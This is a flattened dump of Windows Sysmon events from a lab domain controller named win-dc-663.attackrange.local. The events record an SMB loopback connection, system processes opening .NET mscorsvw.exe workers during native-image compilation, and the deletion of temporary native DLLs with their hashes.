21:07:08.677{4DB9351A-9DD8-60D3-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61461-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local445microsoft-ds 354300x800000000000000023396Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.677{4DB9351A-9DD8-60D3-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61461-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local445microsoft-ds 10341000x800000000000000023395Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.980{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A27D-60D3-AD05-00000000CF01}5960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023394Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.980{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27D-60D3-AD05-00000000CF01}5960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023393Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.964{4DB9351A-A27D-60D3-AC05-00000000CF01}6892NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\TGXVQJ37UP\PresentationFramework-SystemXmlLinq.ni.dll.auxMD5=341CF977C6672F9692797FBF252E7C84,SHA256=9864BFEC9DF71B3DDEB2F063AE3E0BA27D7F225034C715B565471566062DBF55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023392Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.964{4DB9351A-A27D-60D3-AC05-00000000CF01}6892NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\TGXVQJ37UP\PresentationFramework-SystemXmlLinq.ni.dllMD5=EAB8CF355A8F95AA73B9FF0080D90E30,SHA256=DB209E9F3560DF21FF154CFFCE9D13D218D47186E378AAE576C808B49AC94834,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023391Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.949{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27D-60D3-AC05-00000000CF01}6892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023390Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.933{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A27D-60D3-AC05-00000000CF01}6892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023389Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.933{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27D-60D3-AC05-00000000CF01}6892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023388Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.933{4DB9351A-A27D-60D3-AB05-00000000CF01}2636NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\CQKWG7TL9J\PresentationFramework-SystemXml.ni.dll.auxMD5=90BBB06566C0D50A0D0BA31232C9EC70,SHA256=7ED2478021663F6DC46DFEB252B4B1B1C10712021A6DB2FA1DF7DEC8572031FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023387Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.933{4DB9351A-A27D-60D3-AB05-00000000CF01}2636NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\CQKWG7TL9J\PresentationFramework-SystemXml.ni.dllMD5=09C77E565653340DF8781687B2BFC9C5,SHA256=FAADEB60AA4EF54BFE5B232902665673A07AA44CD6F14E842C3CAF34BFB16EB6,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023386Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.902{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27D-60D3-AB05-00000000CF01}2636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023385Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.886{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27D-60D3-AB05-00000000CF01}2636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023384Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.886{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27D-60D3-AB05-00000000CF01}2636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023383Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.886{4DB9351A-A27D-60D3-AA05-00000000CF01}4764NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\TG1PAPLWD5\PresentationFramework-SystemDrawing.ni.dll.auxMD5=A02C0C258601D4B8EB3EDCC93DF92FF8,SHA256=3D42132C0F48D069E8199CBCBA66F222B02F59EE989CC48073EDB9FD12C2B6FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023382Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.886{4DB9351A-A27D-60D3-AA05-00000000CF01}4764NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\TG1PAPLWD5\PresentationFramework-SystemDrawing.ni.dllMD5=80943118284BBE6137CD73A454D59DD5,SHA256=5523D36F1D61BA105F8016022A2FC3FE4AED30727F9AB579A86D520DC46B8414,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023381Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.871{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27D-60D3-AA05-00000000CF01}4764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023380Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.839{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27D-60D3-AA05-00000000CF01}4764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023379Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.839{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27D-60D3-AA05-00000000CF01}4764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023378Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.839{4DB9351A-A27D-60D3-A905-00000000CF01}6740NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\TIK8PRE4FX\PresentationFramework-SystemData.ni.dll.auxMD5=1903BE5CC30FBE0E74D200EABD98F532,SHA256=BFE471B93304341BDB68459251C306D2F35900B05627D84C27A0BA880A297098,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023377Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.839{4DB9351A-A27D-60D3-A905-00000000CF01}6740NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\TIK8PRE4FX\PresentationFramework-SystemData.ni.dllMD5=081ED77008FAA28C44513061EE008444,SHA256=E35AB2F8FF1D3B3A213782F16B7F8044F13C1C97C39A58AA99943B863808EB42,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023376Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.824{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27D-60D3-A905-00000000CF01}6740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023375Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.808{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27D-60D3-A905-00000000CF01}6740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023374Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.808{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27D-60D3-A905-00000000CF01}6740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023373Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.793{4DB9351A-A27D-60D3-A805-00000000CF01}7144NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\20R7G1ETV5\PresentationFramework-SystemCore.ni.dll.auxMD5=50B8A406A7FF787A65EDFE81F99C1C55,SHA256=1EB483375431407468E78C83101F1D883E3B288E051767C34D667397DCFBE15A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023372Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.793{4DB9351A-A27D-60D3-A805-00000000CF01}7144NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\20R7G1ETV5\PresentationFramework-SystemCore.ni.dllMD5=7FD4A41FC6F23A3499BD671051C93E4C,SHA256=4BEADF292DE8E5AD624FCCB06FA8438BD749CB32D359969683819E1F9CB0B525,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023371Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.761{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27D-60D3-A805-00000000CF01}7144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023370Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.746{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A27D-60D3-A805-00000000CF01}7144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023369Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.746{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27D-60D3-A805-00000000CF01}7144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023368Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.746{4DB9351A-A27D-60D3-A705-00000000CF01}5004NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\IV2LVLP994\PresentationBuildTasks.ni.dll.auxMD5=310AB4DE2A79C89D81D62CFAA5D5B6CD,SHA256=DBCC845BE978671D2391107E4447B4CF7ADC39C0F838F461CB6BA5175BD7FD0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023367Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.746{4DB9351A-A27D-60D3-A705-00000000CF01}5004NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\IV2LVLP994\PresentationBuildTasks.ni.dllMD5=DCD86F6D7E39087F3B89B8C3270ECD2E,SHA256=FE7442C4FFA9A33D591E2876B498552B558636CC0B57908B88ACD471AC8566A0,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023366Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 